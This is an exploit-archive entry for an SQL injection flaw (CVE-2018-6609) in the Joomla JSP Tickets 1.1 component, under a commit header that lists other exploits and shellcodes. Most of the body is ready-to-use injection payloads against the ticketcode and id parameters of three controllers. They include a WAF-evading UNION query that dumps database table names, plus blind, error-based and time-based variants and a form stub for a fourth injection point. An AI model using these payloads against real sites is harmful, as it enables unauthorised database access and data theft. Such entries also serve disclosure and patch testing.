efd633079a
19 changes to exploits/shellcodes WordPress Core - 'load-scripts.php' Denial of Service Sync Breeze Enterprise 10.0.28 - Remote Buffer Overflow (PoC) Claymore Dual GPU Miner 10.5 - Format String Apport/ABRT - 'chroot' Local Privilege Escalation (Metasploit) MalwareFox AntiMalware 2.74.0.150 - Privilege Escalation BOCHS 2.6-5 - Buffer Overflow Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010) Wonder CMS 2.3.1 - Unrestricted File Upload Wonder CMS 2.3.1 - 'Host' Header Injection Matrimonial Website Script 2.1.6 - 'uid' SQL Injection NixCMS 1.0 - 'category_id' SQL Injection Online Voting System - Authentication Bypass Joomla! Component Zh BaiduMap 3.0.0.1 - SQL Injection Joomla! Component Zh YandexMap 6.2.1.0 - 'id' SQL Injection Joomla! Component Zh GoogleMap 8.4.0.0 - SQL Injection Joomla! Component jLike 1.0 - Information Leak Joomla! Component JSP Tickets 1.1 - SQL Injection Student Profile Management System Script 2.0.6 - Authentication Bypass Netis WF2419 Router - Cross-Site Scripting Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (136 bytes)
91 lines
No EOL
4.8 KiB
Text
91 lines
No EOL
4.8 KiB
Text
# # # # #
|
|
# Exploit Title: Joomla! Component JSP Tickets 1.1 - SQL Injection
|
|
# Dork: N/A
|
|
# Date: 04.02.2018
|
|
# Vendor Homepage: http://joomlaserviceprovider.com/
|
|
# Software Link: https://extensions.joomla.org/extensions/extension/clients-a-communities/help-desk/jsp-tickets/
|
|
# Version: 1.1
|
|
# Category: Webapps
|
|
# Tested on: WiN7_x64/KaLiLinuX_x64
|
|
# CVE: CVE-2018-6609
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Social: @ihsansencan
|
|
# Want To Donate ?
|
|
# BTC : 1NGEp2eNWRCE6gp2i31UPN6G6KBzMDdCyZ
|
|
# ETH : 0xd606c6b86a1b88c7fcc1f58f7659cfd968449cf2
|
|
# # # # #
|
|
# Description:
|
|
# The vulnerability allows an attacker to inject sql commands....
|
|
#
|
|
# Proof of Concept:
|
|
#
|
|
# 1)
|
|
# http://localhost/[PATH]/index.php?option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=[SQL]
|
|
#
|
|
# -66' /*!07777UNION*/ /*!07777SELECT*/ nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,/*!07777CONCAT*/((/*!07777SELECT*/+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+/*!07777FROM*/+INFORMATION_SCHEMA.TABLES+/*!07777WHERE*/+TABLE_SCHEMA=DATABASE())),nUlL,nUlL,nUlL,nUlL--+VerAyari
|
|
#
|
|
# Parameter: ticketcode (GET)
|
|
# Type: boolean-based blind
|
|
# Title: AND boolean-based blind - WHERE or HAVING clause
|
|
# Payload: option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=5a71d319e86c1' AND 5298=5298 AND 'okLe'='okLe
|
|
#
|
|
# Type: error-based
|
|
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
|
|
# Payload: option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=5a71d319e86c1' AND (SELECT 8072 FROM(SELECT COUNT(*),CONCAT(0x717a6a7871,(SELECT (ELT(8072=8072,1))),0x717a706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'FwvD'='FwvD
|
|
#
|
|
# Type: AND/OR time-based blind
|
|
# Title: MySQL >= 5.0.12 AND time-based blind
|
|
# Payload: option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=5a71d319e86c1' AND SLEEP(5) AND 'Ozir'='Ozir
|
|
#
|
|
# Type: UNION query
|
|
# Title: Generic UNION query (NULL) - 29 columns
|
|
# Payload: option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=-4507' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a6a7871,0x72476c507a64564861484f575645536355695958564f4c4e6858625061774a6b59796b6571746249,0x717a706a71),NULL,NULL,NULL,NULL-- fcOG
|
|
|
|
# 2)
|
|
# http://localhost/[PATH]/index.php?option=com_jsptickets&controller=statuslist&task=edit&id=[SQL]
|
|
#
|
|
# 66 AND (SELECT 66 FROM(SELECT COUNT(*),CONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT (ELT(66=66,1))),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
|
|
#
|
|
#
|
|
# Parameter: id (GET)
|
|
# Type: boolean-based blind
|
|
# Title: AND boolean-based blind - WHERE or HAVING clause
|
|
# Payload: option=com_jsptickets&controller=statuslist&task=edit&id=4 AND 6325=6325
|
|
#
|
|
# Type: error-based
|
|
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
|
|
# Payload: option=com_jsptickets&controller=statuslist&task=edit&id=4 AND (SELECT 4097 FROM(SELECT COUNT(*),CONCAT(0x71716a7a71,(SELECT (ELT(4097=4097,1))),0x717a707a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
|
|
#
|
|
# Type: AND/OR time-based blind
|
|
# Title: MySQL >= 5.0.12 AND time-based blind
|
|
# Payload: option=com_jsptickets&controller=statuslist&task=edit&id=4 AND SLEEP(5)
|
|
#
|
|
# 3)
|
|
# http://localhost/[PATH]/index.php?option=com_jsptickets&controller=prioritylist&task=edit&id=[SQL]
|
|
#
|
|
# 66 AND (SELECT 66 FROM(SELECT COUNT(*),CONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT (ELT(66=66,1))),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
|
|
#
|
|
# Parameter: id (GET)
|
|
# Type: boolean-based blind
|
|
# Title: AND boolean-based blind - WHERE or HAVING clause
|
|
# Payload: option=com_jsptickets&controller=prioritylist&task=edit&id=1 AND 9454=9454
|
|
#
|
|
# Type: error-based
|
|
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
|
|
# Payload: option=com_jsptickets&controller=prioritylist&task=edit&id=1 AND (SELECT 1045 FROM(SELECT COUNT(*),CONCAT(0x7170716a71,(SELECT (ELT(1045=1045,1))),0x716b6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
|
|
#
|
|
# Type: AND/OR time-based blind
|
|
# Title: MySQL >= 5.0.12 OR time-based blind
|
|
# Payload: option=com_jsptickets&controller=prioritylist&task=edit&id=1 OR SLEEP(5)
|
|
#
|
|
# 4)
|
|
#
|
|
# <form method="post" action="http://localhost/[PATH]/index.php?option=com_jsptickets&controller=ticketlist&task=display">
|
|
# <input type="text" name="jform[guestemail]"...
|
|
# <input type="text" name="jform[ticketid]"...
|
|
# <input type="submit" name="searchsubmit"...
|
|
# </form>
|
|
#
|
|
# # # # # |